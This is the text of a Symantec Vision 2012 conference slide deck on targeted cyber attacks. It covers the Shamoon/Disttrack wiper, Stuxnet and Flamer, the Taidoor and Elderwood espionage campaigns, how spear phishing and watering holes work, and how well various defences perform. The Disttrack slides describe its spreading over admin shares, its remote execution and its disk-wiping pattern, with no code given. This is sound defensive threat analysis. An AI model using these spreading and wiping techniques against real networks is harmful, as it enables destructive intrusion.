the new era of cyber threats - home - voxvox.veritas.com/legacyfs/online/veritasdata/is b08.pdf ·...
Post on 26-Sep-2020
4 Views
Preview:
TRANSCRIPT
The New Era of Cyber Threats
Orla Cox Sean Kiernan Sr Manager Manager, Development
Security Response Security Response Symantec Security Response 1
SYMANTEC VISION 2012
403 million new malware variants discovered in 2011
13 new malware variants discovered per second
5.5 billion attacks blocked by Symantec in 2011
Some Interesting Statistics…
SYMANTEC VISION 2012
Hacktivism
What Drives the Modern Day Attacks?
Symantec Security Response 3
Money
Targeted Attacks
Sabotage Espionage
DDoS
Defacement
Banking Trojan
Extortion
Scam
SYMANTEC VISION 2012
So cyberspace is real....It’s the great irony
of our Information Age
– the very technologies that empower us
to create and to build also empower
those who would disrupt and destroy
Targeted Attacks - Sabotage 4
Barack Obama
Sabotage Attacks
SYMANTEC VISION 2012
Damaging attacks used to be done for “fun”
Some Background…
Targeted Attacks - Sabotage 5
Attackers aim to cause havoc and disruption
Attacks causing damage are becoming more organized
Potential state involvement
SYMANTEC VISION 2012
Timeline of Attacks on Critical Infrastructure
Targeted Attacks - Sabotage 6
2 0 0 7 2 0 0 8 2 0 0 9 2 0 1 0 2 0 1 1 2 0 1 2
W32.Gauss
AUG 2012
Estonia DDoS
APR 2007
W32.Duqu
[dyü-kyü]
SEP 2011
W32.Disttrack
SEP 2012
W32.Stuxnet
JUL 2010
W32.Flamer
W32 FLAMER
MAY 2012
SYMANTEC VISION 2012
The Rogue Gallery
Targeted Attacks - Sabotage 7
W32.Disttrack
Exploits:
Region:
Actions:
Year: 2012
0
Middle East
Deletes Files/OS
Notes: Overwrites MBR
W32.Stuxnet
Exploits:
Region:
Actions:
Year: 2010
4
Middle East/Asia
Damages Machinery
Notes: Siemens PLC Code
W32.Flamer
Exploits:
Region:
Actions:
Year: 2012
2
Middle East
Delete Files/OS
W32 FLAMER
Notes: Steals Information
Uses Bluetooth
Recent threats used to perform sabotage on victims…
SYMANTEC VISION 2012
Case Study: W32.Disttrack – Shamoon Attacks
Targeted Attacks - Sabotage 8
Destructive attacks against energy companies
Two middle eastern organizations targeted in quick succession
Multi Stage Attack
• Gather information about target network
• Acquire user credentials
• Gain access to domain controllers
• Spread to computers across network
• Trigger destructive payload
SYMANTEC VISION 2012
W32.Disttrack Behavior
Targeted Attacks - Sabotage 9
Main module
Attack local network shares
• Copies itself to: %System%\trksvr.exe • Starts service: TrkSvr • Deletes itself
• Drop and runs: PKCS7 (C&C server coms module) • Filename: netinit.exe
• Drop and runs: PKCS12 (Disk wiper component) • Filename: %System%\[RANDOM NAME].exe
Run as service Run as executable
No command line args With command line args
Past destruction date?
Copies itself to: \\[REMOTE IP]\ADMINS$\system32\[RANDOME NAME].exe \\[REMOTE IP]\C$\system32\[RANDOME NAME].exe \\[REMOTE IP]\D$\system32\[RANDOME NAME].exe \\[REMOTE IP]\E$\system32\[RANDOME NAME].exe
Executes itself using: 1. Scheduled remote job 2. Create a remote service
SYMANTEC VISION 2012
W32.Disttrack – Wiping Module
Targeted Attacks - Sabotage 10
• Uses legitimate disk driver to read/write disk sectors
• Identifies all system and boot partitions and wipes them all
• Overwrite files with random strings, creating the following pattern on the disk:
• Overwrites MBR with 192K of random data
192K Wiped 1 MB Untouched 192K Wiped 1 MB Untouched …
SYMANTEC VISION 2012
Espionage
Targeted Attacks - Espionage 11
“Targeted threats are a class of
malware destined for one
specific organization or industry.
A type of crimeware, these
threats are of particular concern
because they are designed to
capture sensitive information.” Wikipedia
SYMANTEC VISION 2012
Timeline of Cyber Espionage Attacks
Targeted Attacks - Sabotage 12
2 0 0 7 2 0 0 8 2 0 0 9 2 0 1 0 2 0 1 1 2 0 1 2
Hydraq/Aurora
DEC 2009
W32.Stuxnet
JUN 2009
Hydraq
Ghostnet
JUN 2008
Night Dragon
FEB 2011
Trojan.Taidoor
FEB 2012
台门
LuckyCat
FEB 2012
Elderwood
SEP 2012
SYMANTEC VISION 2012
Information Theft
Targeted Attacks – Espionage 13
Information is
source of wealth &
power
Types of Info
Designs
Business Plans
Financial Info
Personnel Info Information is
a key asset of any organization
SYMANTEC VISION 2012
Targeted Attacks Do Happen • Industrial espionage, hactivism or state sponsored
activity
• 151 targeted attacks per day in June 2012
• Small business often not well protected, but connected to others
Targeted Attacks - Espionage 14
1001-1500 (2.6%)
501-1000 (2.9%)
251-500 (2.9%)
1-250 (37%) 2501+ (44%)
1501-2500 (11%)
Number of employees of the targeted organization per attack
SYMANTEC VISION 2012
Top 10 Most Attacked Sectors 2011
Targeted Attacks - Espionage 15
25.4%
15.4% 13.5%
6.2% 6% 5.9% 4.3%
3.2% 3.2% 3%
SYMANTEC VISION 2012
How They Operate
Targeted Attacks – Espionage 16
INCURSION
Attacker breaks into the network by delivering targeted malware to vulnerable systems and employees
DISCOVERY
Attacker then maps organization’s defenses from the inside
Create a battle plan
CAPTURE
Accesses data on unprotected systems
Installs malware to secretly acquire data or disrupt operations
EXFILTRATION
Data sent to attacker for analysis
Information may be used for various purposes including fraud and planning further attacks
RECONNAISSANCE INCURSION DISCOVERY CAPTURE EXFILTRATION
SYMANTEC VISION 2012 Targeted Attacks – Espionage 17
How Are The Attacks Carried Out?
SYMANTEC VISION 2012
Case Study: Taidoor
• 4 year long targeted attack campaign targeting influencers of US/Taiwanese policy
• Targeted a variety of industries but over time focus narrowed towards think thanks
• Peak number of targeted emails coincided with a US-Taiwanese Defence industry conference in Sept 2011
• “Mr X”, a naval warfare expert, was of particular interest
• Targeted 66 times in 2011!
Targeted Attacks - Espionage 18
Trojan.Taidoor
FEB 2012
台门
SYMANTEC VISION 2012
Case Study: Taidoor
Targeted Attacks – Espionage 19
31% 12%
5%
47%
• Highly targeted email based attacks
• Emails usually contain files with exploit code (rarely use zero-days)
Emails may be generic or tailored for each targeted individual
PDF file format is the most commonly used file format for these attacks
SYMANTEC VISION 2012
Spear Phishing Attacks – How It Works
Targeted Attacks - Espionage 20
Attacker sends
email with
malicious
document or link
1
Exploit is triggered
when user opens
the document or
clicks on link
2 Backdoor is
installed
3
http://badstuffhere.com
SYMANTEC VISION 2012
Case Study: Elderwood Project
• Long-running series of campaigns
• Same group responsible for the Hydraq/Aurora attacks in 2009
• Unlike many other groups, the Elderwood gang have access to zero days
• Better equipped than other groups that we have seen
– Nitro group used 1 zero day
– Sykipot group used 2 zero days
– Stuxnet used 4 zero days
– Elderwood have used 8 zero days!
• Uses both spear-phishing and watering hole attacks
Targeted Attacks - Espionage 21
Elderwood
SEP 2012
SYMANTEC VISION 2012
Watering Hole Attacks – How They Work
Targeted Attacks - Espionage 22
Usage increased substantially in
2012
Attacker hacks legitimate Web server and injects
IFRAME into Web pages 1
2 User browses to legitimate Web site
3 Returned Web pages contain IFRAME pointing to
server hosting exploit kit
Steps in Attack
Server Hosting Exploit Kit
Hacked Web Server
IFRAME
2
1
3
<html> <iframe> </html>
<html> <iframe> </html>
<html> <iframe> </html>
SYMANTEC VISION 2012
Who’s Targeted
Targeted Attacks - Espionage 23
Targets may be any organization with valuable intellectual property
Defense
Shipping Aeronautics
Arms Energy
Manufacturing Engineering Electronic
Financial
NGO
Software
There may be primary
and secondary targets.
Secondary targets are
used as
stepping stones
to the primary
target
SYMANTEC VISION 2012
Targeted Attacks - Conclusion
Targeted Attacks - Espionage 24
• Attackers are persistent
– Attack campaigns can span several years
– Individuals may be targeted multiple times
• Attacks aren’t always sophisticated, and don’t always use zero days
• Majority of attacks originate through email, although watering hole techniques are increasing
• Attackers most often seek intellectual property
SYMANTEC VISION 2012
Demonstration
Symantec Security Response 25
SYMANTEC VISION 2012
Protecting Against Modern Attacks
Symantec Security Response 26
Technology Effectiveness Reason
Email/IM SPAM Filtering Weak • Personalized emails to victims evade SPAM filters
Antivirus Signature Scanning Weak • Attackers can pre-scan executables with existing AV software, and modify until they are no longer detected • Spaghetti code confuses heuristic scanning
Intrusion Prevention Systems Moderate • Most 0-day attacks evade IPS scanners • Protocol anomaly detection may have blocked post- infection communications
Browser Shield & Buffer Overflow Protection
High • Doesn’t require a-priori knowledge of the exploit • Triggers on anomalies in execution path
URL Blocking / Content Filtering Weak • Attacker-generated domains unknown to filter • These domains are therefore typically allowed
File Reputation Scanning High • Relies only on the community reputation of the file, which is typically low for personalized malware files
Behavior Blocking High • Prevents malicious behaviors
Application and Device Control Moderate • Block external devices • Prevent some exploit conditions
Data Loss Prevention Moderate • Network compromised, but sensitive data retained
.Cloud Email Security High •Advanced email heuristics block targeted attack emails
SYMANTEC VISION 2012
How to get more information
Blog http://www.symantec.com/connect/symantec-blogs/sr
Twitter http://twitter.com/threatintel
Whitepapers http://www.symantec.com/security_response/whitepapers.jsp
Symantec Security Response 27
Thank you!
Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Symantec Security Response 28
Orla Cox Sean Kiernan
Sr Manager Manager, Development
Security Response Security Response
SYMANTEC VISION 2012
Other sessions of interest
29
• ISB09 (114, tomorrow 9:00)
– SONAR, Insight, Skeptic and GIN - The Symantec secret sauce
• ISB12/13/14 (117, this afternoon)
– Messaging security deployment options - which is really best for you?
– Web security deployment options - which is really best for you?
– Are You Getting the Most From Symantec Protection Suite?
• ISB11 (114, tomorrow 11:45)
– Demo: integrating Symantec products to get the ultimate protection
• ISB07 (114, tomorrow 13:45)
– The roadmap for Symantec infrastructure protection products
top related